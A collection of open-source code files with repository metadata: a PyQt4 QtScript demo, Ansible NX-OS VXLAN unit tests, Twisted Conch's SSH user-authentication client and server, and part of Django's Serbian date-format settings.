               previous, current, reason, reason_data):
        """Record the notification instead of delivering it anywhere."""
        self.notifications.append((action,
                                   alarm_id,
                                   alarm_name,
                                   severity,
                                   previous,
                                   current,
                                   reason,
                                   reason_data))
| apache-2.0 |
antont/tundra | src/Application/JavascriptModule/proto/qtscript_test.py | 1 | 2402 | """a pyqt test app that embeds javascript using QtScript,
defines qt properties and slots in py, and exposes them to js"""
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtScript import QScriptEngine, QScriptValue
from PyQt4.QtCore import QObject, pyqtSignature, pyqtProperty, QVariant, QTimer
ps1 = ">>> "  # primary prompt of the embedded JavaScript REPL below
ps2 = "... "  # continuation prompt for incomplete JS statements
def printhello():
    # Qt slot connected to the button's clicked signal (Python 2 syntax).
    print "Hello."
app = QtGui.QApplication(sys.argv)
window = QtGui.QWidget()
# Create our main window using a plain QWidget.
window.setWindowTitle("Signals")
# Set our window's title as "Signals".
button = QtGui.QPushButton("Press", window)
# Create, with "Press" as its caption,
# a child button in the window.
# By specifying a parent object,
# this new widget is automatically added to the same.
button.resize(200, 40)
# Resize our button to (200, 40) -> (X, Y)
"""old style signals, works in pyqt 4.4"""
#button.connect(button, QtCore.SIGNAL("clicked()"), printhello) #QtCore.SLOT("quit()"))
#new style signals in 4.5, must upgdate to get these
button.clicked.connect(printhello)
# Connect the button's click signal to the printhello slot above.
window.show()
# Show our window.
class Python(QObject):
    # QObject exposed to the QtScript engine under the global name
    # "python" (see engine.globalObject().setProperty below).
    def __init__(self):
        QObject.__init__(self)
        self.setObjectName("python")
        # Does not work as expected :(
        self.setProperty("app", QVariant(self))
        self.t = QTimer(self)
        self.t.setObjectName("timer")
    @pyqtSignature("QString")
    def hello(self, name):
        # Slot callable from JavaScript as python.hello("world").
        print "Hello,", name
    def get_test(self):
        return 123
    # Qt property visible to scripts as python.test (read via get_test).
    test = pyqtProperty("int", get_test)
engine = QScriptEngine()
# Convenience helper for scripts: dir(obj) lists an object's properties.
engine.evaluate("function dir(obj) { for(o in obj) print(o); }")
py = Python()
spy = engine.newQObject(py)
engine.globalObject().setProperty("python", spy)
#app.exec_()
# Simple read-eval-print loop; Qt events are pumped manually between
# lines since app.exec_() is not running.
print "Ctrl+D to quit"
prompt = ps1
code = ""
while True:
    app.processEvents()
    line = raw_input(prompt)
    if not line.strip():
        continue
    code = code + line + "\n"
    # Only evaluate once the accumulated code forms a complete statement.
    if engine.canEvaluate(code):
        result = engine.evaluate(code)
        if engine.hasUncaughtException():
            bt = engine.uncaughtExceptionBacktrace()
            print "Traceback:"
            print "\n".join(["  %s" % l for l in list(bt)])
            print engine.uncaughtException().toString()
        else:
            print result.toString()
        code = ""
        prompt = ps1
    else:
        prompt = ps2
| apache-2.0 |
pchauncey/ansible | test/units/modules/network/nxos/test_nxos_vxlan_vtep.py | 47 | 2418 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vxlan_vtep
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVxlanVtepVniModule(TestNxosModule):
    # Unit tests for the nxos_vxlan_vtep module; get_config/load_config are
    # patched so no device connection is needed.
    module = nxos_vxlan_vtep
    def setUp(self):
        # Patch the module's config accessors for the duration of each test.
        self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vxlan_vtep.load_config')
        self.load_config = self.mock_load_config.start()
        self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vxlan_vtep.get_config')
        self.get_config = self.mock_get_config.start()
    def tearDown(self):
        self.mock_get_config.stop()
        self.mock_load_config.stop()
    def load_fixtures(self, commands=None, device=''):
        # Serve a canned running-config; swallow any config writes.
        self.get_config.return_value = load_fixture('nxos_vxlan_vtep', 'config.cfg')
        self.load_config.return_value = None
    def test_nxos_vxlan_vtep(self):
        # New description on an existing interface -> change pushed.
        set_module_args(dict(interface='nve1', description='simple description'))
        self.execute_module(changed=True, commands=['interface nve1', 'description simple description'])
    def test_nxos_vxlan_vtep_present_no_change(self):
        # Interface already present in the fixture -> idempotent.
        set_module_args(dict(interface='nve1'))
        self.execute_module(changed=False, commands=[])
    def test_nxos_vxlan_vtep_absent(self):
        set_module_args(dict(interface='nve1', state='absent'))
        self.execute_module(changed=True, commands=['no interface nve1'])
    def test_nxos_vxlan_vtep_absent_no_change(self):
        # Interface not in the fixture, so nothing to remove.
        set_module_args(dict(interface='nve2', state='absent'))
        self.execute_module(changed=False, commands=[])
| gpl-3.0 |
moijes12/oh-mainline | vendor/packages/twisted/twisted/conch/ssh/userauth.py | 17 | 30482 | # -*- test-case-name: twisted.conch.test.test_userauth -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of the ssh-userauth service.
Currently implemented authentication types are public-key and password.
Maintainer: Paul Swartz
"""
import struct, warnings
from twisted.conch import error, interfaces
from twisted.conch.ssh import keys, transport, service
from twisted.conch.ssh.common import NS, getNS
from twisted.cred import credentials
from twisted.cred.error import UnauthorizedLogin
from twisted.internet import defer, reactor
from twisted.python import failure, log
class SSHUserAuthServer(service.SSHService):
"""
A service implementing the server side of the 'ssh-userauth' service. It
is used to authenticate the user on the other side as being able to access
this server.
@ivar name: the name of this service: 'ssh-userauth'
@type name: C{str}
@ivar authenticatedWith: a list of authentication methods that have
already been used.
@type authenticatedWith: C{list}
@ivar loginTimeout: the number of seconds we wait before disconnecting
the user for taking too long to authenticate
@type loginTimeout: C{int}
@ivar attemptsBeforeDisconnect: the number of failed login attempts we
allow before disconnecting.
@type attemptsBeforeDisconnect: C{int}
@ivar loginAttempts: the number of login attempts that have been made
@type loginAttempts: C{int}
@ivar passwordDelay: the number of seconds to delay when the user gives
an incorrect password
@type passwordDelay: C{int}
@ivar interfaceToMethod: a C{dict} mapping credential interfaces to
authentication methods. The server checks to see which of the
cred interfaces have checkers and tells the client that those methods
are valid for authentication.
@type interfaceToMethod: C{dict}
@ivar supportedAuthentications: A list of the supported authentication
methods.
@type supportedAuthentications: C{list} of C{str}
@ivar user: the last username the client tried to authenticate with
@type user: C{str}
@ivar method: the current authentication method
@type method: C{str}
@ivar nextService: the service the user wants started after authentication
has been completed.
@type nextService: C{str}
@ivar portal: the L{twisted.cred.portal.Portal} we are using for
authentication
@type portal: L{twisted.cred.portal.Portal}
@ivar clock: an object with a callLater method. Stubbed out for testing.
"""
name = 'ssh-userauth'
loginTimeout = 10 * 60 * 60
# 10 minutes before we disconnect them
attemptsBeforeDisconnect = 20
# 20 login attempts before a disconnect
passwordDelay = 1 # number of seconds to delay on a failed password
clock = reactor
interfaceToMethod = {
credentials.ISSHPrivateKey : 'publickey',
credentials.IUsernamePassword : 'password',
credentials.IPluggableAuthenticationModules : 'keyboard-interactive',
}
    def serviceStarted(self):
        """
        Called when the userauth service is started. Set up instance
        variables, check if we should allow password/keyboard-interactive
        authentication (only allow if the outgoing connection is encrypted) and
        set up a login timeout.
        """
        self.authenticatedWith = []
        self.loginAttempts = 0
        self.user = None
        self.nextService = None
        self._pamDeferred = None
        self.portal = self.transport.factory.portal
        # Advertise only the methods for which the portal actually has a
        # credentials checker registered.
        self.supportedAuthentications = []
        for i in self.portal.listCredentialsInterfaces():
            if i in self.interfaceToMethod:
                self.supportedAuthentications.append(self.interfaceToMethod[i])
        if not self.transport.isEncrypted('in'):
            # don't let us transport password in plaintext
            if 'password' in self.supportedAuthentications:
                self.supportedAuthentications.remove('password')
            if 'keyboard-interactive' in self.supportedAuthentications:
                self.supportedAuthentications.remove('keyboard-interactive')
        self._cancelLoginTimeout = self.clock.callLater(
            self.loginTimeout,
            self.timeoutAuthentication)
def serviceStopped(self):
"""
Called when the userauth service is stopped. Cancel the login timeout
if it's still going.
"""
if self._cancelLoginTimeout:
self._cancelLoginTimeout.cancel()
self._cancelLoginTimeout = None
    def timeoutAuthentication(self):
        """
        Called when the user has timed out on authentication. Disconnect
        with a DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE message.
        """
        # The timer has fired, so there is nothing left to cancel.
        self._cancelLoginTimeout = None
        self.transport.sendDisconnect(
            transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
            'you took too long')
    def tryAuth(self, kind, user, data):
        """
        Try to authenticate the user with the given method.  Dispatches to a
        auth_* method.
        @param kind: the authentication method to try.
        @type kind: C{str}
        @param user: the username the client is authenticating with.
        @type user: C{str}
        @param data: authentication specific data sent by the client.
        @type data: C{str}
        @return: A Deferred called back if the method succeeded, or erred back
            if it failed.
        @rtype: C{defer.Deferred}
        """
        log.msg('%s trying auth %s' % (user, kind))
        if kind not in self.supportedAuthentications:
            return defer.fail(
                    error.ConchError('unsupported authentication, failing'))
        # SSH method names use '-', Python attribute names use '_'.
        kind = kind.replace('-', '_')
        f = getattr(self,'auth_%s'%kind, None)
        if f:
            ret = f(data)
            if not ret:
                return defer.fail(
                        error.ConchError('%s return None instead of a Deferred'
                            % kind))
            else:
                return ret
        return defer.fail(error.ConchError('bad auth type: %s' % kind))
    def ssh_USERAUTH_REQUEST(self, packet):
        """
        The client has requested authentication.  Payload::
            string user
            string next service
            string method
            <authentication specific data>
        @type packet: C{str}
        """
        user, nextService, method, rest = getNS(packet, 3)
        if user != self.user or nextService != self.nextService:
            # Different user or target service: start authentication over.
            self.authenticatedWith = [] # clear auth state
        self.user = user
        self.nextService = nextService
        self.method = method
        d = self.tryAuth(method, user, rest)
        if not d:
            self._ebBadAuth(
                failure.Failure(error.ConchError('auth returned none')))
            return
        d.addCallback(self._cbFinishedAuth)
        d.addErrback(self._ebMaybeBadAuth)
        d.addErrback(self._ebBadAuth)
        return d
    def _cbFinishedAuth(self, (interface, avatar, logout)):
        """
        The callback when user has successfully been authenticated.  For a
        description of the arguments, see L{twisted.cred.portal.Portal.login}.
        We start the service requested by the user.

        Note: uses Python 2 tuple-unpacking parameter syntax.
        """
        self.transport.avatar = avatar
        self.transport.logoutFunction = logout
        service = self.transport.factory.getService(self.transport,
                self.nextService)
        if not service:
            raise error.ConchError('could not get next service: %s'
                                  % self.nextService)
        log.msg('%s authenticated with %s' % (self.user, self.method))
        self.transport.sendPacket(MSG_USERAUTH_SUCCESS, '')
        self.transport.setService(service())
    def _ebMaybeBadAuth(self, reason):
        """
        An intermediate errback.  If the reason is
        error.NotEnoughAuthentication, we send a MSG_USERAUTH_FAILURE, but
        with the partial success indicator set.
        @type reason: L{twisted.python.failure.Failure}
        """
        reason.trap(error.NotEnoughAuthentication)
        # The trailing '\xff' byte is the partial-success flag.
        self.transport.sendPacket(MSG_USERAUTH_FAILURE,
                NS(','.join(self.supportedAuthentications)) + '\xff')
    def _ebBadAuth(self, reason):
        """
        The final errback in the authentication chain.  If the reason is
        error.IgnoreAuthentication, we simply return; the authentication
        method has sent its own response.  Otherwise, send a failure message
        and (if the method is not 'none') increment the number of login
        attempts.
        @type reason: L{twisted.python.failure.Failure}
        """
        if reason.check(error.IgnoreAuthentication):
            return
        if self.method != 'none':
            log.msg('%s failed auth %s' % (self.user, self.method))
            if reason.check(UnauthorizedLogin):
                log.msg('unauthorized login: %s' % reason.getErrorMessage())
            elif reason.check(error.ConchError):
                log.msg('reason: %s' % reason.getErrorMessage())
            else:
                log.msg(reason.getTraceback())
            self.loginAttempts += 1
            if self.loginAttempts > self.attemptsBeforeDisconnect:
                # Too many failures: drop the connection entirely.
                self.transport.sendDisconnect(
                        transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
                        'too many bad auths')
                return
        self.transport.sendPacket(
                MSG_USERAUTH_FAILURE,
                NS(','.join(self.supportedAuthentications)) + '\x00')
    def auth_publickey(self, packet):
        """
        Public key authentication.  Payload::
            byte has signature
            string algorithm name
            string key blob
            [string signature] (if has signature is True)
        Create a SSHPublicKey credential and verify it using our portal.
        """
        hasSig = ord(packet[0])
        algName, blob, rest = getNS(packet[1:], 2)
        pubKey = keys.Key.fromString(blob)
        signature = hasSig and getNS(rest)[0] or None
        if hasSig:
            # Reconstruct the exact byte string the client signed so the
            # signature can be verified against it.
            b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
                NS(self.user) + NS(self.nextService) + NS('publickey') +
                chr(hasSig) +  NS(pubKey.sshType()) + NS(blob))
            c = credentials.SSHPrivateKey(self.user, algName, blob, b,
                    signature)
            return self.portal.login(c, None, interfaces.IConchUser)
        else:
            # No signature yet: the client is only probing whether this key
            # would be acceptable.
            c = credentials.SSHPrivateKey(self.user, algName, blob, None, None)
            return self.portal.login(c, None,
                    interfaces.IConchUser).addErrback(self._ebCheckKey,
                            packet[1:])
    def _ebCheckKey(self, reason, packet):
        """
        Called back if the user did not sent a signature.  If reason is
        error.ValidPublicKey then this key is valid for the user to
        authenticate with.  Send MSG_USERAUTH_PK_OK.
        """
        reason.trap(error.ValidPublicKey)
        # if we make it here, it means that the publickey is valid
        self.transport.sendPacket(MSG_USERAUTH_PK_OK, packet)
        # Stop further errbacks from treating this as a failed attempt.
        return failure.Failure(error.IgnoreAuthentication())
    def auth_password(self, packet):
        """
        Password authentication.  Payload::
            string password
        Make a UsernamePassword credential and verify it with our portal.
        """
        # packet[0] is a leading boolean byte preceding the password string.
        password = getNS(packet[1:])[0]
        c = credentials.UsernamePassword(self.user, password)
        return self.portal.login(c, None, interfaces.IConchUser).addErrback(
                self._ebPassword)
def _ebPassword(self, f):
"""
If the password is invalid, wait before sending the failure in order
to delay brute-force password guessing.
"""
d = defer.Deferred()
self.clock.callLater(self.passwordDelay, d.callback, f)
return d
def auth_keyboard_interactive(self, packet):
"""
Keyboard interactive authentication. No payload. We create a
PluggableAuthenticationModules credential and authenticate with our
portal.
"""
if self._pamDeferred is not None:
self.transport.sendDisconnect(
transport.DISCONNECT_PROTOCOL_ERROR,
"only one keyboard interactive attempt at a time")
return defer.fail(error.IgnoreAuthentication())
c = credentials.PluggableAuthenticationModules(self.user,
self._pamConv)
return self.portal.login(c, None, interfaces.IConchUser)
def _pamConv(self, items):
"""
Convert a list of PAM authentication questions into a
MSG_USERAUTH_INFO_REQUEST. Returns a Deferred that will be called
back when the user has responses to the questions.
@param items: a list of 2-tuples (message, kind). We only care about
kinds 1 (password) and 2 (text).
@type items: C{list}
@rtype: L{defer.Deferred}
"""
resp = []
for message, kind in items:
if kind == 1: # password
resp.append((message, 0))
elif kind == 2: # text
resp.append((message, 1))
elif kind in (3, 4):
return defer.fail(error.ConchError(
'cannot handle PAM 3 or 4 messages'))
else:
return defer.fail(error.ConchError(
'bad PAM auth kind %i' % kind))
packet = NS('') + NS('') + NS('')
packet += struct.pack('>L', len(resp))
for prompt, echo in resp:
packet += NS(prompt)
packet += chr(echo)
self.transport.sendPacket(MSG_USERAUTH_INFO_REQUEST, packet)
self._pamDeferred = defer.Deferred()
return self._pamDeferred
def ssh_USERAUTH_INFO_RESPONSE(self, packet):
"""
The user has responded with answers to PAMs authentication questions.
Parse the packet into a PAM response and callback self._pamDeferred.
Payload::
uint32 numer of responses
string response 1
...
string response n
"""
d, self._pamDeferred = self._pamDeferred, None
try:
resp = []
numResps = struct.unpack('>L', packet[:4])[0]
packet = packet[4:]
while len(resp) < numResps:
response, packet = getNS(packet)
resp.append((response, 0))
if packet:
raise error.ConchError("%i bytes of extra data" % len(packet))
except:
d.errback(failure.Failure())
else:
d.callback(resp)
class SSHUserAuthClient(service.SSHService):
    """
    A service implementing the client side of 'ssh-userauth'.
    @ivar name: the name of this service: 'ssh-userauth'
    @type name: C{str}
    @ivar preferredOrder: a list of authentication methods we support, in
        order of preference.  The client will try authentication methods in
        this order, making callbacks for information when necessary.
    @type preferredOrder: C{list}
    @ivar user: the name of the user to authenticate as
    @type user: C{str}
    @ivar instance: the service to start after authentication has finished
    @type instance: L{service.SSHService}
    @ivar authenticatedWith: a list of strings of authentication methods we've tried
    @type authenticatedWith: C{list} of C{str}
    @ivar triedPublicKeys: a list of public key objects that we've tried to
        authenticate with
    @type triedPublicKeys: C{list} of L{Key}
    @ivar lastPublicKey: the last public key object we've tried to authenticate
        with
    @type lastPublicKey: L{Key}
    """
    name = 'ssh-userauth'
    preferredOrder = ['publickey', 'password', 'keyboard-interactive']
    def __init__(self, user, instance):
        # user: account name to authenticate as; instance: the SSHService
        # to start once authentication succeeds.
        self.user = user
        self.instance = instance
    def serviceStarted(self):
        # Reset per-connection state, then request the 'none' method to
        # learn which authentication methods the server accepts.
        self.authenticatedWith = []
        self.triedPublicKeys = []
        self.lastPublicKey = None
        self.askForAuth('none', '')
def askForAuth(self, kind, extraData):
"""
Send a MSG_USERAUTH_REQUEST.
@param kind: the authentication method to try.
@type kind: C{str}
@param extraData: method-specific data to go in the packet
@type extraData: C{str}
"""
self.lastAuth = kind
self.transport.sendPacket(MSG_USERAUTH_REQUEST, NS(self.user) +
NS(self.instance.name) + NS(kind) + extraData)
def tryAuth(self, kind):
"""
Dispatch to an authentication method.
@param kind: the authentication method
@type kind: C{str}
"""
kind = kind.replace('-', '_')
log.msg('trying to auth with %s' % (kind,))
f = getattr(self,'auth_%s' % (kind,), None)
if f:
return f()
    def _ebAuth(self, ignored, *args):
        """
        Generic callback for a failed authentication attempt. Respond by
        asking for the list of accepted methods (the 'none' method)
        """
        # A single failed attempt is not fatal; re-query the method list.
        self.askForAuth('none', '')
    def ssh_USERAUTH_SUCCESS(self, packet):
        """
        We received a MSG_USERAUTH_SUCCESS.  The server has accepted our
        authentication, so start the next service.
        """
        # Hand the connection over to the service we were asked to start.
        self.transport.setService(self.instance)
    def ssh_USERAUTH_FAILURE(self, packet):
        """
        We received a MSG_USERAUTH_FAILURE. Payload::
            string methods
            byte partial success
        If partial success is C{True}, then the previous method succeeded but is
        not sufficient for authentication. C{methods} is a comma-separated list
        of accepted authentication methods.
        We sort the list of methods by their position in C{self.preferredOrder},
        removing methods that have already succeeded. We then call
        C{self.tryAuth} with the most preferred method.
        @param packet: the L{MSG_USERAUTH_FAILURE} payload.
        @type packet: C{str}
        @return: a L{defer.Deferred} that will be callbacked with C{None} as
        soon as all authentication methods have been tried, or C{None} if no
        more authentication methods are available.
        @rtype: C{defer.Deferred} or C{None}
        """
        canContinue, partial = getNS(packet)
        partial = ord(partial)
        if partial:
            # Partial success: remember this method so it is not retried.
            self.authenticatedWith.append(self.lastAuth)
        def orderByPreference(meth):
            """
            Invoked once per authentication method in order to extract a
            comparison key which is then used for sorting.
            @param meth: the authentication method.
            @type meth: C{str}
            @return: the comparison key for C{meth}.
            @rtype: C{int}
            """
            if meth in self.preferredOrder:
                return self.preferredOrder.index(meth)
            else:
                # put the element at the end of the list.
                return len(self.preferredOrder)
        canContinue = sorted([meth for meth in canContinue.split(',')
                              if meth not in self.authenticatedWith],
                             key=orderByPreference)
        log.msg('can continue with: %s' % canContinue)
        return self._cbUserauthFailure(None, iter(canContinue))
def _cbUserauthFailure(self, result, iterator):
if result:
return
try:
method = iterator.next()
except StopIteration:
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
'no more authentication methods available')
else:
d = defer.maybeDeferred(self.tryAuth, method)
d.addCallback(self._cbUserauthFailure, iterator)
return d
def ssh_USERAUTH_PK_OK(self, packet):
"""
This message (number 60) can mean several different messages depending
on the current authentication type. We dispatch to individual methods
in order to handle this request.
"""
func = getattr(self, 'ssh_USERAUTH_PK_OK_%s' %
self.lastAuth.replace('-', '_'), None)
if func is not None:
return func(packet)
else:
self.askForAuth('none', '')
    def ssh_USERAUTH_PK_OK_publickey(self, packet):
        """
        This is MSG_USERAUTH_PK.  Our public key is valid, so we create a
        signature and try to authenticate with it.
        """
        publicKey = self.lastPublicKey
        # Bytes to sign: session id plus the userauth request fields; the
        # '\xff' byte is the non-zero 'has signature' flag.
        b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
             NS(self.user) + NS(self.instance.name) + NS('publickey') +
             '\xff' + NS(publicKey.sshType()) + NS(publicKey.blob()))
        d = self.signData(publicKey, b)
        if not d:
            # No private key available; ask for 'none' so the flow moves on.
            self.askForAuth('none', '')
            # this will fail, we'll move on
            return
        d.addCallback(self._cbSignedData)
        d.addErrback(self._ebAuth)
def ssh_USERAUTH_PK_OK_password(self, packet):
"""
This is MSG_USERAUTH_PASSWD_CHANGEREQ. The password given has expired.
We ask for an old password and a new password, then send both back to
the server.
"""
prompt, language, rest = getNS(packet, 2)
self._oldPass = self._newPass = None
d = self.getPassword('Old Password: ')
d = d.addCallbacks(self._setOldPass, self._ebAuth)
d.addCallback(lambda ignored: self.getPassword(prompt))
d.addCallbacks(self._setNewPass, self._ebAuth)
def ssh_USERAUTH_PK_OK_keyboard_interactive(self, packet):
"""
This is MSG_USERAUTH_INFO_RESPONSE. The server has sent us the
questions it wants us to answer, so we ask the user and sent the
responses.
"""
name, instruction, lang, data = getNS(packet, 3)
numPrompts = struct.unpack('!L', data[:4])[0]
data = data[4:]
prompts = []
for i in range(numPrompts):
prompt, data = getNS(data)
echo = bool(ord(data[0]))
data = data[1:]
prompts.append((prompt, echo))
d = self.getGenericAnswers(name, instruction, prompts)
d.addCallback(self._cbGenericAnswers)
d.addErrback(self._ebAuth)
    def _cbSignedData(self, signedData):
        """
        Called back out of self.signData with the signed data.  Send the
        authentication request with the signature.
        @param signedData: the data signed by the user's private key.
        @type signedData: C{str}
        """
        publicKey = self.lastPublicKey
        # '\xff' is the non-zero 'has signature' flag byte.
        self.askForAuth('publickey', '\xff' + NS(publicKey.sshType()) +
                NS(publicKey.blob()) + NS(signedData))
    def _setOldPass(self, op):
        """
        Called back when we are choosing a new password.  Simply store the old
        password for now.
        @param op: the old password as entered by the user
        @type op: C{str}
        """
        self._oldPass = op
def _setNewPass(self, np):
"""
Called back when we are choosing a new password. Get the old password
and send the authentication message with both.
@param np: the new password as entered by the user
@type np: C{str}
"""
op = self._oldPass
self._oldPass = None
self.askForAuth('password', '\xff' + NS(op) + NS(np))
def _cbGenericAnswers(self, responses):
"""
Called back when we are finished answering keyboard-interactive
questions. Send the info back to the server in a
MSG_USERAUTH_INFO_RESPONSE.
@param responses: a list of C{str} responses
@type responses: C{list}
"""
data = struct.pack('!L', len(responses))
for r in responses:
data += NS(r.encode('UTF8'))
self.transport.sendPacket(MSG_USERAUTH_INFO_RESPONSE, data)
def auth_publickey(self):
"""
Try to authenticate with a public key. Ask the user for a public key;
if the user has one, send the request to the server and return True.
Otherwise, return False.
@rtype: C{bool}
"""
d = defer.maybeDeferred(self.getPublicKey)
d.addBoth(self._cbGetPublicKey)
return d
    def _cbGetPublicKey(self, publicKey):
        """
        Called with the result of getPublicKey().  Accepts a L{keys.Key},
        a deprecated C{str} blob (converted with a warning), or anything
        else (treated as 'no key available').  Sends the public-key query
        and returns True, or returns False when there is no key to offer.
        """
        if isinstance(publicKey, str):
            warnings.warn("Returning a string from "
                          "SSHUserAuthClient.getPublicKey() is deprecated "
                          "since Twisted 9.0.  Return a keys.Key() instead.",
                          DeprecationWarning)
            publicKey = keys.Key.fromString(publicKey)
        if not isinstance(publicKey, keys.Key):        # failure or None
            publicKey = None
        if publicKey is not None:
            self.lastPublicKey = publicKey
            self.triedPublicKeys.append(publicKey)
            log.msg('using key of type %s' % publicKey.type())
            # '\x00' byte: no signature attached, this is only a query.
            self.askForAuth('publickey', '\x00' + NS(publicKey.sshType()) +
                            NS(publicKey.blob()))
            return True
        else:
            return False
def auth_password(self):
"""
Try to authenticate with a password. Ask the user for a password.
If the user will return a password, return True. Otherwise, return
False.
@rtype: C{bool}
"""
d = self.getPassword()
if d:
d.addCallbacks(self._cbPassword, self._ebAuth)
return True
else: # returned None, don't do password auth
return False
def auth_keyboard_interactive(self):
"""
Try to authenticate with keyboard-interactive authentication. Send
the request to the server and return True.
@rtype: C{bool}
"""
log.msg('authing with keyboard-interactive')
self.askForAuth('keyboard-interactive', NS('') + NS(''))
return True
    def _cbPassword(self, password):
        """
        Called back when the user gives a password.  Send the request to the
        server.
        @param password: the password the user entered
        @type password: C{str}
        """
        # Leading '\x00' byte: this is a plain login, not a password change.
        self.askForAuth('password', '\x00' + NS(password))
    def signData(self, publicKey, signData):
        """
        Sign the given data with the given public key.
        By default, this will call getPrivateKey to get the private key,
        then sign the data using Key.sign().
        This method is factored out so that it can be overridden to use
        alternate methods, such as a key agent.
        @param publicKey: The public key object returned from L{getPublicKey}
        @type publicKey: L{keys.Key}
        @param signData: the data to be signed by the private key.
        @type signData: C{str}
        @return: a Deferred that's called back with the signature, or C{None}
            when no private key is available
        @rtype: L{defer.Deferred}
        """
        key = self.getPrivateKey()
        if not key:
            # No private key available; the caller falls back to 'none'.
            return
        return key.addCallback(self._cbSignData, signData)
    def _cbSignData(self, privateKey, signData):
        """
        Called back when the private key is returned.  Sign the data and
        return the signature.
        @param privateKey: the private key object
        @type privateKey: L{keys.Key}
        @param signData: the data to be signed by the private key.
        @type signData: C{str}
        @return: the signature
        @rtype: C{str}
        """
        if not isinstance(privateKey, keys.Key):
            # Deprecated path: wrap a raw PyCrypto key object.
            warnings.warn("Returning a PyCrypto key object from "
                          "SSHUserAuthClient.getPrivateKey() is deprecated "
                          "since Twisted 9.0.  Return a keys.Key() instead.",
                          DeprecationWarning)
            privateKey = keys.Key(privateKey)
        return privateKey.sign(signData)
    def getPublicKey(self):
        """
        Return a public key for the user.  If no more public keys are
        available, return C{None}.
        This implementation always returns C{None}.  Override it in a
        subclass to actually find and return a public key object.
        @rtype: L{Key} or L{NoneType}
        """
        return None
    def getPrivateKey(self):
        """
        Return a L{Deferred} that will be called back with the private key
        object corresponding to the last public key from getPublicKey().
        If the private key is not available, errback on the Deferred.
        @rtype: L{Deferred} called back with L{Key}
        """
        # Subclasses must override; the base class has no key material.
        return defer.fail(NotImplementedError())
    def getPassword(self, prompt = None):
        """
        Return a L{Deferred} that will be called back with a password.
        prompt is a string to display for the password, or None for a generic
        'user@hostname's password: '.
        @type prompt: C{str}/C{None}
        @rtype: L{defer.Deferred}
        """
        # Subclasses must override to actually ask the user.
        return defer.fail(NotImplementedError())
    def getGenericAnswers(self, name, instruction, prompts):
        """
        Returns a L{Deferred} with the responses to the prompts.
        @param name: The name of the authentication currently in progress.
        @param instruction: Describes what the authentication wants.
        @param prompts: A list of (prompt, echo) pairs, where prompt is a
        string to display and echo is a boolean indicating whether the
        user's response should be echoed as they type it.
        """
        # Subclasses must override to actually ask the user.
        return defer.fail(NotImplementedError())
MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_FAILURE = 51
MSG_USERAUTH_SUCCESS = 52
MSG_USERAUTH_BANNER = 53
# Message number 60 is overloaded: its meaning depends on the method named
# in the preceding MSG_USERAUTH_REQUEST, hence the three aliases below.
MSG_USERAUTH_PASSWD_CHANGEREQ = 60
MSG_USERAUTH_INFO_REQUEST = 60
MSG_USERAUTH_INFO_RESPONSE = 61
MSG_USERAUTH_PK_OK = 60
messages = {}
# Build a number -> name map from the MSG_* constants for protocol logging.
for k, v in locals().items():
    if k[:4]=='MSG_':
        messages[v] = k # doesn't handle doubles
SSHUserAuthServer.protocolMessages = messages
SSHUserAuthClient.protocolMessages = messages
del messages
del v
| agpl-3.0 |
robhudson/django | django/conf/locale/sr/formats.py | 1008 | 2011 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# Serbian (sr) locale formats.
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y.'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y. H:i'
YEAR_MONTH_FORMAT = 'F Y.'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y.'
SHORT_DATETIME_FORMAT = 'j.m.Y. H:i'
FIRST_DAY_OF_WEEK = 1  # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
    '%d.%m.%Y.', '%d.%m.%y.',               # '25.10.2006.', '25.10.06.'
    '%d. %m. %Y.', '%d. %m. %y.',           # '25. 10. 2006.', '25. 10. 06.'
    # '%d. %b %y.', '%d. %B %y.',           # '25. Oct 06.', '25. October 06.'
    # '%d. %b \'%y.', '%d. %B \'%y.',       # '25. Oct '06.', '25. October '06.'
    # '%d. %b %Y.', '%d. %B %Y.',           # '25. Oct 2006.', '25. October 2006.'
]
DATETIME_INPUT_FORMATS = [
    '%d.%m.%Y. %H:%M:%S',       # '25.10.2006. 14:30:59'
    '%d.%m.%Y. %H:%M:%S.%f',    # '25.10.2006. 14:30:59.000200'
    '%d.%m.%Y. %H:%M',          # '25.10.2006. 14:30'
    '%d.%m.%Y.',                # '25.10.2006.'
    '%d.%m.%y. %H:%M:%S',       # '25.10.06. 14:30:59'
    '%d.%m.%y. %H:%M:%S.%f',    # '25.10.06. 14:30:59.000200'
    '%d.%m.%y. %H:%M',          # '25.10.06. 14:30'
    '%d.%m.%y.',                # '25.10.06.'
    '%d. %m. %Y. %H:%M:%S',     # '25. 10. 2006. 14:30:59'
    '%d. %m. %Y. %H:%M:%S.%f',  # '25. 10. 2006. 14:30:59.000200'
